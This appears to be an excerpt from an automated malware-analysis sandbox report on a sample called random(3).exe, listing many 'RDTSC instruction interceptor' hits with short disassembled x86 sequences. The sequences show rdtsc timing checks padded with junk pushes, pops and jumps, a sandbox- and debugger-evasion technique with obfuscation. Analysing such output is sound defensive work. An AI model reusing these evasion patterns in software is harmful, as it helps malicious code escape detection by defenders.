    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153AEFA second address: 153AF04 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29FC4F3696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153B054 second address: 153B058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153B058 second address: 153B079 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F29FC4F3696h 0x0000000d jmp 00007F29FC4F36A2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153B079 second address: 153B07F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153B1E4 second address: 153B20C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pushad 0x00000009 jmp 00007F29FC4F36A7h 0x0000000e jnc 00007F29FC4F3696h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153B20C second address: 153B247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F29FC518E96h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F29FC518EA9h 0x00000017 popad 0x00000018 pushad 0x00000019 push edx 0x0000001a pop edx 0x0000001b jmp 00007F29FC518E9Bh 0x00000020 popad 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14C5C57 second address: 14C5C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153F96B second address: 153F995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518E9Ah 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F29FC518EA1h 0x00000013 js 00007F29FC518E96h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153F995 second address: 153F99B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153F99B second address: 153F9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153F9A5 second address: 153F9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14D3105 second address: 14D3109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14D3109 second address: 14D3120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F29FC4F369Ah 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15466C9 second address: 15466E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518EA8h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15466E6 second address: 15466F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F29FC4F3696h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15466F0 second address: 1546705 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F29FC518E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007F29FC518E96h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1546705 second address: 154671D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jl 00007F29FC4F36A2h 0x00000010 jnl 00007F29FC4F3696h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14C4217 second address: 14C421D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14C421D second address: 14C423E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jo 00007F29FC4F3696h 0x0000000c jmp 00007F29FC4F36A4h 0x00000011 pop edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1545244 second address: 1545263 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F29FC518EAAh 0x00000008 jmp 00007F29FC518EA4h 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15453F6 second address: 154541A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC4F369Eh 0x00000009 jmp 00007F29FC4F36A2h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1545572 second address: 154557C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15459A2 second address: 15459BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC4F36A7h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1545F7A second address: 1545F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518EA4h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1545F92 second address: 1545F96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1545F96 second address: 1545F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1545F9C second address: 1545FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F29FC4F3696h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1545FAC second address: 1545FB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1545FB0 second address: 1545FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1545FB6 second address: 1545FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15460FB second address: 154611B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC4F36A8h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 154611B second address: 154611F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14EF684 second address: 14EF69E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F29FC4F3696h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F29FC4F369Eh 0x00000012 jo 00007F29FC4F3696h 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14EF69E second address: 14EF6B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jc 00007F29FC518E9Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14EF6B5 second address: 14EF6D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jbe 00007F29FC4F3696h 0x0000000b jmp 00007F29FC4F36A7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1544DF7 second address: 1544E1C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F29FC518EADh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1549FA3 second address: 1549FC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 jmp 00007F29FC4F36A7h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15126D4 second address: 15126D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15126D8 second address: 15126EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F29FC4F369Bh 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15127AF second address: 15127B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 151281B second address: 1512858 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F369Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F29FC4F36AFh 0x00000011 jmp 00007F29FC4F36A9h 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1512858 second address: 151285D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 151285D second address: 1512878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FC4F36A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 151296A second address: 151297E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007F29FC518EA0h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1512A11 second address: 1512A63 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F29FC4F36A0h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c xor ch, 0000007Ah 0x0000000f nop 0x00000010 jmp 00007F29FC4F36A7h 0x00000015 push eax 0x00000016 pushad 0x00000017 jmp 00007F29FC4F36A6h 0x0000001c push eax 0x0000001d push edx 0x0000001e jno 00007F29FC4F3696h 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 150CECF second address: 150CED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1512B45 second address: 1512B4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1512B4B second address: 1512B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1512C31 second address: 1512C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1512D4B second address: 1512D66 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F29FC518E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F29FC518E9Dh 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1512D66 second address: 1512DB1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F29FC4F3696h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F29FC4F3698h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 xor dword ptr [ebp+122D28D1h], ecx 0x0000002d push 00000004h 0x0000002f mov cx, bx 0x00000032 sub dword ptr [ebp+122D22E6h], esi 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jno 00007F29FC4F369Ch 0x00000041 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15135B4 second address: 1513603 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ecx, dword ptr [ebp+1244ED22h] 0x00000010 lea eax, dword ptr [ebp+1248BFBDh] 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F29FC518E98h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 nop 0x00000031 push eax 0x00000032 pushad 0x00000033 push esi 0x00000034 pop esi 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 pop eax 0x00000039 push eax 0x0000003a pushad 0x0000003b push esi 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1513603 second address: 14EF684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F29FC4F3698h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 call 00007F29FC4F36A3h 0x0000002a mov ecx, dword ptr [ebp+122D230Bh] 0x00000030 pop ecx 0x00000031 call dword ptr [ebp+122D278Fh] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jnp 00007F29FC4F3696h 0x00000041 jnp 00007F29FC4F3696h 0x00000047 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 154A27E second address: 154A292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518E9Bh 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 154A412 second address: 154A416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 154A416 second address: 154A420 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 154A866 second address: 154A882 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F29FC4F3696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F29FC4F369Fh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 154ABBE second address: 154ABC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 155351C second address: 1553522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1553522 second address: 155352C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F29FC518E96h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 155352C second address: 1553547 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F29FC4F36A2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1553547 second address: 155354D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1553CEA second address: 1553CEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1553CEE second address: 1553D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F29FC518E96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1553FF2 second address: 1554011 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1557682 second address: 15576A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F29FC518E98h 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14CC768 second address: 14CC76E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14CC76E second address: 14CC772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1557399 second address: 155739F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 155A79B second address: 155A7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 155A321 second address: 155A327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 155A327 second address: 155A32B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 155A48C second address: 155A492 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 155A492 second address: 155A4AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F29FC518E96h 0x0000000a jmp 00007F29FC518EA3h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 155A4AF second address: 155A4B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 155F669 second address: 155F66D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 155F7BF second address: 155F7C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 155F7C3 second address: 155F7C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 155F7C9 second address: 155F7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jl 00007F29FC4F36AEh 0x0000000d jbe 00007F29FC4F369Ch 0x00000013 jc 00007F29FC4F369Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 155FBB0 second address: 155FBB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 155FBB6 second address: 155FBCC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007F29FC4F3696h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F29FC4F3696h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 155FD3F second address: 155FD43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 155FD43 second address: 155FD61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F29FC4F36A8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1512F7D second address: 1512F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 155FEC5 second address: 155FED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a jc 00007F29FC4F3696h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 156003A second address: 1560042 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1560042 second address: 1560047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1560A9B second address: 1560AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518EA0h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1560AB6 second address: 1560AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F369Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a ja 00007F29FC4F36C3h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1560AD3 second address: 1560AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1560AD9 second address: 1560ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1560ADD second address: 1560AE3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
